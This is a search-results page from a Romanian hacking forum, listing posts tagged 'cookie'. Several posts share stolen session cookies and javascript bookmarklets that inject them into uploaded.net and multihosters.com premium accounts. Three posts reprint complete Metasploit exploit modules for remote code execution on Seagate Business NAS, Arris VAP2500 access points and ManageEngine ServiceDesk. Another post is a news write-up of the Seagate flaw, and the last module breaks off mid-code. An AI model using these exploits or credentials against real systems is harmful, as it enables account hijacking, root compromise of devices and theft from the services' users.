Jump to content

Search the Community

Showing results for tags 'cookie'.

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


Forums

  • Informatii generale
    • Anunturi importante
    • Bine ai venit
    • Proiecte RST
  • Sectiunea tehnica
    • Exploituri
    • Challenges (CTF)
    • Bug Bounty
    • Programare
    • Securitate web
    • Reverse engineering & exploit development
    • Mobile security
    • Sisteme de operare si discutii hardware
    • Electronica
    • Wireless Pentesting
    • Black SEO & monetizare
  • Tutoriale
    • Tutoriale in romana
    • Tutoriale in engleza
    • Tutoriale video
  • Programe
    • Programe hacking
    • Programe securitate
    • Programe utile
    • Free stuff
  • Discutii generale
    • RST Market
    • Off-topic
    • Discutii incepatori
    • Stiri securitate
    • Linkuri
    • Cosul de gunoi
  • Club Test's Topics
  • Clubul saraciei absolute's Topics
  • Chernobyl Hackers's Topics
  • Programming & Fun's Jokes / Funny pictures (programming related!)
  • Programming & Fun's Programming
  • Programming & Fun's Programming challenges
  • Bani pă net's Topics
  • Cumparaturi online's Topics
  • Web Development's Forum
  • 3D Print's Topics

Find results in...

Find results that contain...


Date Created

  • Start

    End


Last Updated

  • Start

    End


Filter by number of...

Joined

  • Start

    End


Group


Website URL


Yahoo


Jabber


Skype


Location


Interests


Biography


Location


Interests


Occupation

Found 9 results

  1. Cookie %26id%3D7966032%26pw%3D4d9012b4a77a9524d675dad27c3276ab5705e5e8%26cks%3D2708d9d0e36e %26id%3D6257396%26pw%3Dcad1524360e58851cd0ae1e82b75ff5283474667%26cks%3D02f673a8fbc2 %26id%3D13068390%26pw%3Dd6aa9171e302378fdeb3ccf09e6dee703efe1700%26cks%3D0afdf4c70886 %26id%3D6102943%26pw%3D2c6e228379589e9bfb8c61bcd7def9c3a1c7d195%26cks%3D4d65c2cb70b1
  2. javascript:%20var%20domain%20=%20'uploaded.net';var%20cookies%20=%20new%20Array();cookies['login']%20='%26id%3D3515726%26pw%3Df059f890b34d847989aab5cbff1b1db28fba4b60%26cks%3D71b098b74bde';if%20(location.href.indexOf(domain)==-1)%20{var%20g%20=%20confirm('Welcome%20'%20+%20domain%20+%20'%20page.%20Copy%20again%20the%20script%20to%20address%20bar%20and%20run%20again%20this%20script%20.%20Continue?');if%20(g)%20{location.href%20=%20'http://'%20+%20domain;}}%20else%20{alert("..::Premiumangle.com%20::..");for(var%20i%20in%20cookies){void(document.cookie%20=%20i+'='+cookies[i]+';domain=.'+domain+';path=/;');}location.href%20=%20'http://'+domain;}
  3. javascript:%20var%20domain%20=%20'multihosters.com';var%20cookies%20=%20new%20Array();cookies['.ASPNETAUTH']%20='010159C9B4F3DE33D208FE5989C5C7CC37D208010D6600640075006E006B0040006100740074002E006E0065007400064D0065006D00620065007200012F00FF';if%20(location.href.indexOf(domain)==-1)%20{var%20g%20=%20confirm('You%20will%20be%20redirected%20to%20'%20+%20domain%20+%20'.%20You%20will%20have%20to%20run%20this%20script%20again.%20Continue?');if%20(g)%20{location.href%20=%20'http://'%20+%20domain;}}%20else%20{alert("..::%20Premiumangle.com%20::..");for(var%20i%20in%20cookies){void(document.cookie%20=%20i+'='+cookies[i]+';domain=.'+domain+';path=/;');}location.href%20=%20'http://'+domain;}
  4. https://rstforums.com/forum/99145-php-cookie-stealer-version.rst#post619762
  5. ## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' require 'rexml/document' class Metasploit4 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpClient def initialize(info = {}) super(update_info(info, 'Name' => 'Seagate Business NAS Unauthenticated Remote Command Execution', 'Description' => %q{ Some Seagate Business NAS devices are vulnerable to command execution via a local file include vulnerability hidden in the language parameter of the CodeIgniter session cookie. The vulnerability manifests in the way the language files are included in the code on the login page, and hence is open to attack from users without the need for authentication. The cookie can be easily decrypted using a known static encryption key and re-encrypted once the PHP object string has been modified. This module has been tested on the STBN300 device. }, 'Author' => [ 'OJ Reeves <oj[at]beyondbinary.io>' # Discovery and Metasploit module ], 'References' => [ ['CVE', '2014-8684'], ['CVE', '2014-8686'], ['CVE', '2014-8687'], ['EDB', '36202'], ['URL', 'http://www.seagate.com/au/en/support/external-hard-drives/network-storage/business-storage-2-bay-nas/'], ['URL', 'https://beyondbinary.io/advisory/seagate-nas-rce/'] ], 'DisclosureDate' => 'Mar 01 2015', 'Privileged' => true, 'Platform' => 'php', 'Arch' => ARCH_PHP, 'Payload' => {'DisableNops' => true}, 'Targets' => [['Automatic', {}]], 'DefaultTarget' => 0, 'License' => MSF_LICENSE )) register_options([ OptString.new('TARGETURI', [true, 'Path to the application root', '/']), OptString.new('ADMINACCOUNT', [true, 'Name of the NAS admin account', 'admin']), OptString.new('COOKIEID', [true, 'ID of the CodeIgniter session cookie', 'ci_session']), OptString.new('XORKEY', [true, 'XOR Key used for the CodeIgniter session', '0f0a000d02011f0248000d290d0b0b0e03010e07']) ]) end # # Write a string value to a serialized PHP object without deserializing it first. # If the value exists it will be updated. # def set_string(php_object, name, value) prefix = "s:#{name.length}:\"#{name}\";s:" if php_object.include?(prefix) # the value already exists in the php blob, so update it. return php_object.gsub("#{prefix}\\d+:\"[^\"]*\"", "#{prefix}#{value.length}:\"#{value}\"") end # the value doesn't exist in the php blob, so create it. count = php_object.split(':')[1].to_i + 1 php_object.gsub(/a:\d+(.*)}$/, "a:#{count}\\1#{prefix}#{value.length}:\"#{value}\";}") end # # Findez ze holez! # def check begin res = send_request_cgi( 'uri' => normalize_uri(target_uri), 'method' => 'GET', 'headers' => { 'Accept' => 'text/html' } ) if res && res.code == 200 headers = res.to_s # validate headers if headers.incude?('X-Powered-By: PHP/5.2.13') && headers.include?('Server: lighttpd/1.4.28') # and make sure that the body contains the title we'd expect if res.body.include?('Login to BlackArmor') return Exploit::CheckCode::Appears end end end rescue Rex::ConnectionRefused, Rex::ConnectionTimeout, Rex::HostUnreachable # something went wrong, assume safe. end Exploit::CheckCode::Safe end # # Executez ze sploitz! # def exploit # Step 1 - Establish a session with the target which will give us a PHP object we can # work with. begin print_status("#{peer} - Establishing session with target ...") res = send_request_cgi({ 'uri' => normalize_uri(target_uri), 'method' => 'GET', 'headers' => { 'Accept' => 'text/html' } }) if res && res.code == 200 && res.to_s =~ /#{datastore['COOKIEID']}=([^;]+);/ cookie_value = $1.strip else fail_with(Exploit::Failure::Unreachable, "#{peer} - Unexpected response from server.") end rescue Rex::ConnectionRefused, Rex::ConnectionTimeout, Rex::HostUnreachable fail_with(Exploit::Failure::Unreachable, "#{peer} - Unable to establish connection.") end # Step 2 - Decrypt the cookie so that we have a PHP object we can work with directly # then update it so that it's an admin session before re-encrypting print_status("#{peer} - Upgrading session to administrator ...") php_object = decode_cookie(cookie_value) vprint_status("#{peer} - PHP Object: #{php_object}") admin_php_object = set_string(php_object, 'is_admin', 'yes') admin_php_object = set_string(admin_php_object, 'username', datastore['ADMINACCOUNT']) vprint_status("#{peer} - Admin PHP object: #{admin_php_object}") admin_cookie_value = encode_cookie(admin_php_object) # Step 3 - Extract the current host configuration so that we don't lose it. host_config = nil # This time value needs to be consistent across calls config_time = ::Time.now.to_i begin print_status("#{peer} - Extracting existing host configuration ...") res = send_request_cgi( 'uri' => normalize_uri(target_uri, 'index.php/mv_system/get_general_setup'), 'method' => 'GET', 'headers' => { 'Accept' => 'text/html' }, 'cookie' => "#{datastore['COOKIEID']}=#{admin_cookie_value}", 'vars_get' => { '_' => config_time } ) if res && res.code == 200 res.body.split("\r\n").each do |l| if l.include?('general_setup') host_config = l break end end else fail_with(Exploit::Failure::Unreachable, "#{peer} - Unexpected response from server.") end rescue Rex::ConnectionRefused, Rex::ConnectionTimeout, Rex::HostUnreachable fail_with(Exploit::Failure::Unreachable, "#{peer} - Unable to establish connection.") end print_good("#{peer} - Host configuration extracted.") vprint_status("#{peer} - Host configuration: #{host_config}") # Step 4 - replace the host device description with a custom payload that can # be used for LFI. We have to keep the payload small because of size limitations # and we can't put anything in with '$' in it. So we need to make a simple install # payload which will write a required payload to disk that can be executes directly # as the last part of the payload. This will also be self-deleting. param_id = rand_text_alphanumeric(3) # There are no files on the target file system that start with an underscore # so to allow for a small file size that doesn't collide with an existing file # we'll just prefix it with an underscore. payload_file = "_#{rand_text_alphanumeric(3)}.php" installer = "file_put_contents('#{payload_file}', base64_decode($_POST['#{param_id}']));" stager = Rex::Text.encode_base64(installer) stager = xml_encode("<?php eval(base64_decode('#{stager}')); ?>") vprint_status("#{peer} - Stager: #{stager}") # Butcher the XML directly rather than attempting to use REXML. The target XML # parser is way to simple/flaky to deal with the proper stuff that REXML # spits out. desc_start = host_config.index('" description="') + 15 desc_end = host_config.index('"', desc_start) xml_payload = host_config[0, desc_start] + stager + host_config[desc_end, host_config.length] vprint_status(xml_payload) # Step 5 - set the host description to the stager so that it is written to disk print_status("#{peer} - Uploading stager ...") begin res = send_request_cgi( 'uri' => normalize_uri(target_uri, 'index.php/mv_system/set_general_setup'), 'method' => 'POST', 'headers' => { 'Accept' => 'text/html' }, 'cookie' => "#{datastore['COOKIEID']}=#{admin_cookie_value}", 'vars_get' => { '_' => config_time }, 'vars_post' => { 'general_setup' => xml_payload } ) unless res && res.code == 200 fail_with(Exploit::Failure::Unreachable, "#{peer} - Stager upload failed (invalid result).") end rescue Rex::ConnectionRefused, Rex::ConnectionTimeout, Rex::HostUnreachable fail_with(Exploit::Failure::Unreachable, "#{peer} - Stager upload failed (unable to establish connection).") end print_good("#{peer} - Stager uploaded.") # Step 6 - Invoke the stage, passing in a self-deleting php script body. print_status("#{peer} - Executing stager ...") payload_php_object = set_string(php_object, 'language', "../../../etc/devicedesc\x00") payload_cookie_value = encode_cookie(payload_php_object) self_deleting_payload = "<?php unlink(__FILE__);\r\n#{payload.encoded}; ?>" errored = false begin res = send_request_cgi( 'uri' => normalize_uri(target_uri), 'method' => 'POST', 'headers' => { 'Accept' => 'text/html' }, 'cookie' => "#{datastore['COOKIEID']}=#{payload_cookie_value}", 'vars_post' => { param_id => Rex::Text.encode_base64(self_deleting_payload) } ) if res && res.code == 200 print_good("#{peer} - Stager execution succeeded, payload ready for execution.") else print_error("#{peer} - Stager execution failed (invalid result).") errored = true end rescue Rex::ConnectionRefused, Rex::ConnectionTimeout, Rex::HostUnreachable print_error("#{peer} - Stager execution failed (unable to establish connection).") errored = true end # Step 7 - try to restore the previous configuration, allowing exceptions # to bubble up given that we're at the end. This step is important because # we don't want to leave a trail of junk on disk at the end. print_status("#{peer} - Restoring host config ...") res = send_request_cgi( 'uri' => normalize_uri(target_uri, 'index.php/mv_system/set_general_setup'), 'method' => 'POST', 'headers' => { 'Accept' => 'text/html' }, 'cookie' => "#{datastore['COOKIEID']}=#{admin_cookie_value}", 'vars_get' => { '_' => config_time }, 'vars_post' => { 'general_setup' => host_config } ) # Step 8 - invoke the installed payload, but only if all went to plan. unless errored print_status("#{peer} - Executing payload at #{normalize_uri(target_uri, payload_file)} ...") res = send_request_cgi( 'uri' => normalize_uri(target_uri, payload_file), 'method' => 'GET', 'headers' => { 'Accept' => 'text/html' }, 'cookie' => "#{datastore['COOKIEID']}=#{payload_cookie_value}" ) end end # # Take a CodeIgnitor cookie and pull out the PHP object using the XOR # key that we've been given. # def decode_cookie(cookie_content) cookie_value = Rex::Text.decode_base64(URI.decode(cookie_content)) pass = xor(cookie_value, datastore['XORKEY']) result = '' (0...pass.length).step(2).each do |i| result << (pass[i].ord ^ pass[i + 1].ord).chr end result end # # Take a serialised PHP object cookie value and encode it so that # CodeIgniter thinks it's legit. # def encode_cookie(cookie_value) rand = Rex::Text.sha1(rand_text_alphanumeric(40)) block = '' (0...cookie_value.length).each do |i| block << rand[i % rand.length] block << (rand[i % rand.length].ord ^ cookie_value[i].ord).chr end cookie_value = xor(block, datastore['XORKEY']) cookie_value = CGI.escape(Rex::Text.encode_base64(cookie_value)) vprint_status("#{peer} - Cookie value: #{cookie_value}") cookie_value end # # XOR a value against a key. The key is cycled. # def xor(string, key) result = '' string.bytes.zip(key.bytes.cycle).each do |s, k| result << (s ^ k) end result end # # Simple XML substitution because the target XML handler isn't really # full blown or smart. # def xml_encode(str) str.gsub(/</, '<').gsub(/>/, '>') end end
  6. Seagate, a popular vendor of hardware solutions, has a critical zero-day vulnerability in its Network Attached Storage (NAS) device software that possibly left thousands of its users vulnerable to hackers. Seagate's Business Storage 2-Bay NAS product, found in home and business networks, is vulnerable to a zero-day Remote Code Execution vulnerability, currently affecting more than 2,500 publicly exposed devices on the Internet. Seagate is one of the world’s largest vendor of hardware solutions, with products available worldwide. After Western Digital, Seagate ranked second and holds 41% of the market worldwide in supplying storage hardware products. A security researcher, named OJ Reeves, discovered the zero-day remote code execution vulnerability on 7th October last year and, reported to the company totally in the white hat style. But even after 130 days of responsible disclosure, the zero-day bug remains unpatched till now. In order to exploit the vulnerability, an attacker needs to be on the same network as the vulnerable device which gives the attacker root access of the vulnerable device, without the need of a valid login. Reeves also released a python exploit along with its Metasploit module version which is available on Github. ORIGIN OF ZERO-DAY VULNERABILITY Seagate's Business Storage 2-Bay NAS products come with a web-enabled management application that lets administrators to perform device configuration functions such as adding users, setting up access control, managing files, and more. This web application is built with three core technologies, including PHP version 5.2.13, CodeIgniter version 2.1.0 and Lighttpd version 1.4.28, which are all out-dated versions. PHP version 5.2.13 is vulnerable (CVE-2006-7243) that allows user-controlled data to prematurely terminate file paths, allowing for full control over the file extension. CodeIgniter version prior to 2.2.0 is vulnerable (CVE-2014-8686) that allows an attacker to extract the encryption key and decrypt the content of the cookie. Once decrypted, attacker can modify the content of the cookie and re-encrypt it prior to submitting it back to the server. The custom web application authenticate the login user based upon browser cookies, having three parameters: username: logged in user name is_admin: user is admin or not i.e. Yes or No language: chosen language (eg. en_US) Researcher explained that there is no further validation of user credentials at server-end, once username cookie is established, which could be impersonated easily by an attacker. Another parameter 'is_admin' can be manipulated to 'Yes' value that allows the attacker to self-elevate to administrative privileges in the web application itself. The language parameter can be manipulated for exploitation of a local file inclusion vulnerability. At last, the web application is being executed by an instance of Lighttpd which is running under the context of the root user. When an attacker makes a request with the manipulated cookie, it results in arbitrary code execution as root user. Therefore, successful exploitation of this vulnerability could result in taking complete control of the vulnerable device as a root user. VULNERABLE PRODUCTS Two different network storage devices made by Seagate were tested and found to be vulnerable. The latest Seagate NAS firmware version listed below are affected by this zero-day vulnerability: Business Storage 2-Bay NAS version 2014.00319 Business Storage 2-Bay NAS version 2013.60311 However, Reeves believes that all versions of Business Storage 2-Bay NAS product prior to 2014.00319 are affected by the same vulnerability. METASPLOIT MODULE AVAILABLE A Metasploit module and a Python script to exploit the vulnerability automatically is available on the Github. Each of these scripts are able to perform the following tasks: Connects to the vulnerable NAS device and extracts a ci_session cookie. Decrypts the cookie using the static encryption key and extracts the PHP hash. Modifies the serialized PHP hash so that the username is set to 'admin' and the is_admin field is set to 'yes'. Encrypts this updated PHP hash ready for further use as a ci_session cookie, which allows future requests to operate on the NAS as if they were an administrator. Performs a request to extract the host configuration, which includes the device's description. Modifies the host configuration so that the device description contains a small stager payload. Performs a request to update the host configuration with the new data so that the stager payload is written to /etc/devicedesc. Modifies the PHP hash again so that the language parameter contains the value ../../../../etc/devicedesc\x00. Encrypts this new PHP hash ready for future use as a ci_session cookie. Performs a request to the NAS using the cookie created in the previous step, which invokes the stager that was written to disk. This request posts a larger payload which is written to disk under the web server root. Performs another request which then resets the host configuration back to what it was prior to exploitation. According to Reeves, there was no updated firmware version available for download that contains patches for the issues, even after contacting the company multiple times. Users of Seagate's Business Storage NAS products and and other products using vulnerable firmware are recommended to ensure that their devices are not accessible via the public Internet and that the devices be located behind a firewall configured to allow only a trusted set of IP addresses to connect to the web interface. Source
  7. ## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpClient def initialize(info = {}) super(update_info(info, 'Name' => 'Arris VAP2500 tools_command.php Command Execution', 'Description' => %q{ Arris VAP2500 access points are vulnerable to OS command injection in the web management portal via the tools_command.php page. Though authentication is required to access this page, it is trivially bypassed by setting the value of a cookie to an md5 hash of a valid username. }, 'Author' => [ 'HeadlessZeke' # Vulnerability discovery and Metasploit module ], 'License' => MSF_LICENSE, 'References' => [ ['CVE', '2014-8423'], ['CVE', '2014-8424'], ['OSVDB', '115045'], ['OSVDB', '115046'], ['BID', '71297'], ['BID', '71299'], ['URL', 'http://goto.fail/blog/2014/11/25/at-and-t-u-verse-vap2500-the-passwords-they-do-nothing/'] ], 'DisclosureDate' => 'Nov 25 2014', 'Privileged' => true, 'Payload' => { 'DisableNops' => true, 'Space' => 1024, 'Compat' => { 'PayloadType' => 'cmd', 'RequiredCmd' => 'generic telnet' } }, 'Platform' => 'unix', 'Arch' => ARCH_CMD, 'Targets' => [[ 'Automatic', { }]], 'DefaultTarget' => 0 )) end def check begin res = send_request_raw({ 'method' => 'GET', 'uri' => '/tools_command.php', 'cookie' => "p=#{Rex::Text.md5('super')}" }) if res && res.code == 200 && res.body.to_s =~ /TOOLS - COMMAND/ return Exploit::CheckCode::Vulnerable end rescue ::Rex::ConnectionError return Exploit::CheckCode::Unknown end Exploit::CheckCode::Safe end def exploit print_status("#{peer} - Trying to access the device ...") unless check == Exploit::CheckCode::Vulnerable fail_with(Failure::NotVulnerable, "#{peer} - Failed to access the vulnerable device") end print_status("#{peer} - Exploiting...") if datastore['PAYLOAD'] == 'cmd/unix/generic' exploit_cmd else exploit_session end end def exploit_cmd beg_boundary = rand_text_alpha(8) end_boundary = rand_text_alpha(8) begin res = send_request_cgi({ 'uri' => normalize_uri('/', 'tools_command.php'), 'vars_post' => { 'cmb_header' => '', 'txt_command' => "echo #{beg_boundary}; #{payload.encoded}; echo #{end_boundary}" }, 'method' => 'POST', 'cookie' => "p=#{Rex::Text.md5('super')}" }) if res && res.code == 200 && res.body.to_s =~ /TOOLS - COMMAND/ print_good("#{peer} - Command sent successfully") if res.body.to_s =~ /#{beg_boundary}(.*)#{end_boundary}/m print_status("#{peer} - Command output: #{$1}") end else fail_with(Failure::UnexpectedReply, "#{peer} - Command execution failed") end rescue ::Rex::ConnectionError fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the web server") end end def exploit_session begin send_request_cgi({ 'uri' => normalize_uri('/', 'tools_command.php'), 'vars_post' => { 'cmb_header' => '', 'txt_command' => "#{payload.encoded}" }, 'method' => 'POST', 'cookie' => "p=#{Rex::Text.md5('super')}" }, 3) rescue ::Rex::ConnectionError fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the web server") end end end Source
  8. ## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient def initialize(info = {}) super(update_info(info, 'Name' => 'ManageEngine Multiple Products Authenticated File Upload', 'Description' => %q{ This module exploits a directory traversal vulnerability in ManageEngine ServiceDesk, AssetExplorer, SupportCenter and IT360 when uploading attachment files. The JSP that accepts the upload does not handle correctly '../' sequences, which can be abused to write in the file system. Authentication is needed to exploit this vulnerability, but this module will attempt to login using the default credentials for the administrator and guest accounts. Alternatively you can provide a pre-authenticated cookie or a username / password combo. For IT360 targets enter the RPORT of the ServiceDesk instance (usually 8400). All versions of ServiceDesk prior v9 build 9031 (including MSP but excluding v4), AssetExplorer, SupportCenter and IT360 (including MSP) are vulnerable. At the time of release of this module, only ServiceDesk v9 has been fixed in build 9031 and above. This module has been been tested successfully in Windows and Linux on several versions. }, 'Author' => [ 'Pedro Ribeiro <pedrib[at]gmail.com>' # Vulnerability Discovery and Metasploit module ], 'License' => MSF_LICENSE, 'References' => [ ['CVE', '2014-5301'], ['OSVDB', '116733'], ['URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/ManageEngine/me_sd_file_upload.txt'], ['URL', 'http://seclists.org/fulldisclosure/2015/Jan/5'] ], 'DefaultOptions' => { 'WfsDelay' => 30 }, 'Privileged' => false, # Privileged on Windows but not on Linux targets 'Platform' => 'java', 'Arch' => ARCH_JAVA, 'Targets' => [ [ 'Automatic', { } ], [ 'ServiceDesk Plus v5-v7.1 < b7016/AssetExplorer v4/SupportCenter v5-v7.9', { 'attachment_path' => '/workorder/Attachment.jsp' } ], [ 'ServiceDesk Plus/Plus MSP v7.1 >= b7016 - v9.0 < b9031/AssetExplorer v5-v6.1', { 'attachment_path' => '/common/FileAttachment.jsp' } ], [ 'IT360 v8-v10.4', { 'attachment_path' => '/common/FileAttachment.jsp' } ] ], 'DefaultTarget' => 0, 'DisclosureDate' => 'Dec 15 2014')) register_options( [ Opt::RPORT(8080), OptString.new('JSESSIONID', [false, 'Pre-authenticated JSESSIONID cookie (non-IT360 targets)']), OptString.new('IAMAGENTTICKET', [false, 'Pre-authenticated IAMAGENTTICKET cookie (IT360 target only)']), OptString.new('USERNAME', [true, 'The username to login as', 'guest']), OptString.new('PASSWORD', [true, 'Password for the specified username', 'guest']), OptString.new('DOMAIN_NAME', [false, 'Name of the domain to logon to']) ], self.class) end def get_version res = send_request_cgi({ 'uri' => '/', 'method' => 'GET' }) # Major version, minor version, build and product (sd = servicedesk; ae = assetexplorer; sc = supportcenterl; it = it360) version = [ 9999, 9999, 0, 'sd' ] if res && res.code == 200 if res.body.to_s =~ /ManageEngine ServiceDesk/ if res.body.to_s =~ / \| ([0-9]{1}\.{1}[0-9]{1}\.?[0-9]*)/ output = $1 version = [output[0].to_i, output[2].to_i, '0', 'sd'] end if res.body.to_s =~ /src='\/scripts\/Login\.js\?([0-9]+)'><\/script>/ # newer builds version[2] = $1.to_i elsif res.body.to_s =~ /'\/style\/style\.css', '([0-9]+)'\);<\/script>/ # older builds version[2] = $1.to_i end elsif res.body.to_s =~ /ManageEngine AssetExplorer/ if res.body.to_s =~ /ManageEngine AssetExplorer ([0-9]{1}\.{1}[0-9]{1}\.?[0-9]*)/ || res.body.to_s =~ /<div class="login-versioninfo">version ([0-9]{1}\.{1}[0-9]{1}\.?[0-9]*)<\/div>/ output = $1 version = [output[0].to_i, output[2].to_i, 0, 'ae'] end if res.body.to_s =~ /src="\/scripts\/ClientLogger\.js\?([0-9]+)"><\/script>/ version[2] = $1.to_i end elsif res.body.to_s =~ /ManageEngine SupportCenter Plus/ # All of the vulnerable sc installations are "old style", so we don't care about the major / minor version version[3] = 'sc' if res.body.to_s =~ /'\/style\/style\.css', '([0-9]+)'\);<\/script>/ # ... but get the build number if we can find it version[2] = $1.to_i end elsif res.body.to_s =~ /\/console\/ConsoleMain\.cc/ # IT360 newer versions version[3] = 'it' end elsif res && res.code == 302 && res.get_cookies.to_s =~ /IAMAGENTTICKET([A-Z]{0,4})/ # IT360 older versions, not a very good detection string but there is no alternative? version[3] = 'it' end version end def check version = get_version # TODO: put fixed version on the two ifs below once (if...) products are fixed # sd was fixed on build 9031 # ae and sc still not fixed if (version[0] <= 9 && version[0] > 4 && version[2] < 9031 && version[3] == 'sd') || (version[0] <= 6 && version[2] < 99999 && version[3] == 'ae') || (version[3] == 'sc' && version[2] < 99999) return Exploit::CheckCode::Appears end if (version[2] > 9030 && version[3] == 'sd') || (version[2] > 99999 && version[3] == 'ae') || (version[2] > 99999 && version[3] == 'sc') return Exploit::CheckCode::Safe else # An IT360 check always lands here, there is no way to get the version easily return Exploit::CheckCode::Unknown end end def authenticate_it360(port, path, username, password) if datastore['DOMAIN_NAME'] == nil vars_post = { 'LOGIN_ID' => username, 'PASSWORD' => password, 'isADEnabled' => 'false' } else vars_post = { 'LOGIN_ID' => username, 'PASSWORD' => password, 'isADEnabled' => 'true', 'domainName' => datastore['DOMAIN_NAME'] } end res = send_request_cgi({ 'rport' => port, 'method' => 'POST', 'uri' => normalize_uri(path), 'vars_get' => { 'service' => 'ServiceDesk', 'furl' => '/', 'timestamp' => Time.now.to_i }, 'vars_post' => vars_post }) if res && res.get_cookies.to_s =~ /IAMAGENTTICKET([A-Z]{0,4})=([\w]{9,})/ # /IAMAGENTTICKET([A-Z]{0,4})=([\w]{9,})/ -> this pattern is to avoid matching "removed" return res.get_cookies else return nil end end def get_it360_cookie_name res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri("/") }) cookie = res.get_cookies if cookie =~ /IAMAGENTTICKET([A-Z]{0,4})/ return $1 else return nil end end def login_it360 # Do we already have a valid cookie? If yes, just return that. if datastore['IAMAGENTTICKET'] cookie_name = get_it360_cookie_name cookie = 'IAMAGENTTICKET' + cookie_name + '=' + datastore['IAMAGENTTICKET'] + ';' return cookie end # get the correct path, host and port res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri('/') }) if res && res.redirect? uri = [ res.redirection.port, res.redirection.path ] else return nil end cookie = authenticate_it360(uri[0], uri[1], datastore['USERNAME'], datastore['PASSWORD']) if cookie != nil return cookie elsif datastore['USERNAME'] == 'guest' && datastore['JSESSIONID'] == nil # we've tried with the default guest password, now let's try with the default admin password cookie = authenticate_it360(uri[0], uri[1], 'administrator', 'administrator') if cookie != nil return cookie else # Try one more time with the default admin login for some versions cookie = authenticate_it360(uri[0], uri[1], 'admin', 'admin') if cookie != nil return cookie end end end nil end # # Authenticate and validate our session cookie. We need to submit credentials to # j_security_check and then follow the redirect to HomePage.do to create a valid # authenticated session. # def authenticate(cookie, username, password) res = send_request_cgi!({ 'method' => 'POST', 'uri' => normalize_uri('/j_security_check;' + cookie.to_s.gsub(';', '')), 'ctype' => 'application/x-www-form-urlencoded', 'cookie' => cookie, 'vars_post' => { 'j_username' => username, 'j_password' => password, 'logonDomainName' => datastore['DOMAIN_NAME'] } }) if res && (res.code == 302 || (res.code == 200 && res.body.to_s =~ /redirectTo="\+'HomePage\.do';/)) # sd and ae respond with 302 while sc responds with a 200 return true else return false end end def login # Do we already have a valid cookie? If yes, just return that. if datastore['JSESSIONID'] != nil cookie = 'JSESSIONID=' + datastore['JSESSIONID'].to_s + ';' return cookie end # First we get a valid JSESSIONID to pass to authenticate() res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri('/') }) if res && res.code == 200 cookie = res.get_cookies authenticated = authenticate(cookie, datastore['USERNAME'], datastore['PASSWORD']) if authenticated return cookie elsif datastore['USERNAME'] == 'guest' && datastore['JSESSIONID'] == nil # we've tried with the default guest password, now let's try with the default admin password authenticated = authenticate(cookie, 'administrator', 'administrator') if authenticated return cookie else # Try one more time with the default admin login for some versions authenticated = authenticate(cookie, 'admin', 'admin') if authenticated return cookie end end end end nil end def send_multipart_request(cookie, payload_name, payload_str) if payload_name =~ /\.ear/ upload_path = '../../server/default/deploy' else upload_path = rand_text_alpha(4+rand(4)) end post_data = Rex::MIME::Message.new if @my_target == targets[1] # old style post_data.add_part(payload_str, 'application/octet-stream', 'binary', "form-data; name=\"#{Rex::Text.rand_text_alpha(4+rand(4))}\"; filename=\"#{payload_name}\"") post_data.add_part(payload_name, nil, nil, "form-data; name=\"filename\"") post_data.add_part('', nil, nil, "form-data; name=\"vecPath\"") post_data.add_part('', nil, nil, "form-data; name=\"vec\"") post_data.add_part('AttachFile', nil, nil, "form-data; name=\"theSubmit\"") post_data.add_part('WorkOrderForm', nil, nil, "form-data; name=\"formName\"") post_data.add_part(upload_path, nil, nil, "form-data; name=\"component\"") post_data.add_part('Attach', nil, nil, "form-data; name=\"ATTACH\"") else post_data.add_part(upload_path, nil, nil, "form-data; name=\"module\"") post_data.add_part(payload_str, 'application/octet-stream', 'binary', "form-data; name=\"#{Rex::Text.rand_text_alpha(4+rand(4))}\"; filename=\"#{payload_name}\"") post_data.add_part('', nil, nil, "form-data; name=\"att_desc\"") end data = post_data.to_s res = send_request_cgi({ 'uri' => normalize_uri(@my_target['attachment_path']), 'method' => 'POST', 'data' => data, 'ctype' => "multipart/form-data; boundary=#{post_data.bound}", 'cookie' => cookie }) return res end def pick_target return target if target.name != 'Automatic' version = get_version if (version[0] <= 7 && version[2] < 7016 && version[3] == 'sd') || (version[0] == 4 && version[3] == 'ae') || (version[3] == 'sc') # These are all "old style" versions (sc is always old style) return targets[1] elsif version[3] == 'it' return targets[3] else return targets[2] end end def exploit if check == Exploit::CheckCode::Safe fail_with(Failure::NotVulnerable, "#{peer} - Target not vulnerable") end print_status("#{peer} - Selecting target...") @my_target = pick_target print_status("#{peer} - Selected target #{@my_target.name}") if @my_target == targets[3] cookie = login_it360 else cookie = login end if cookie.nil? fail_with(Exploit::Failure::Unknown, "#{peer} - Failed to authenticate") end # First we generate the WAR with the payload... war_app_base = rand_text_alphanumeric(4 + rand(32 - 4)) war_payload = payload.encoded_war({ :app_name => war_app_base }) # ... and then we create an EAR file that will contain it. ear_app_base = rand_text_alphanumeric(4 + rand(32 - 4)) app_xml = "<?xml version=\"1.0\" encoding=\"UTF-8\"?>" app_xml << '<application>' app_xml << "<display-name>#{rand_text_alphanumeric(4 + rand(32 - 4))}</display-name>" app_xml << "<module><web><web-uri>#{war_app_base + ".war"}</web-uri>" app_xml << "<context-root>/#{ear_app_base}</context-root></web></module></application>" # Zipping with CM_STORE to avoid errors while decompressing the zip # in the Java vulnerable application ear_file = Rex::Zip::Archive.new(Rex::Zip::CM_STORE) ear_file.add_file(war_app_base + '.war', war_payload.to_s) ear_file.add_file('META-INF/application.xml', app_xml) ear_file_name = rand_text_alphanumeric(4 + rand(32 - 4)) + '.ear' if @my_target != targets[3] # Linux doesn't like it when we traverse non existing directories, # so let's create them by sending some random data before the EAR. # (IT360 does not have a Linux version so we skip the bogus file for it) print_status("#{peer} - Uploading bogus file...") res = send_multipart_request(cookie, rand_text_alphanumeric(4 + rand(32 - 4)), rand_text_alphanumeric(4 + rand(32 - 4))) if res && res.code != 200 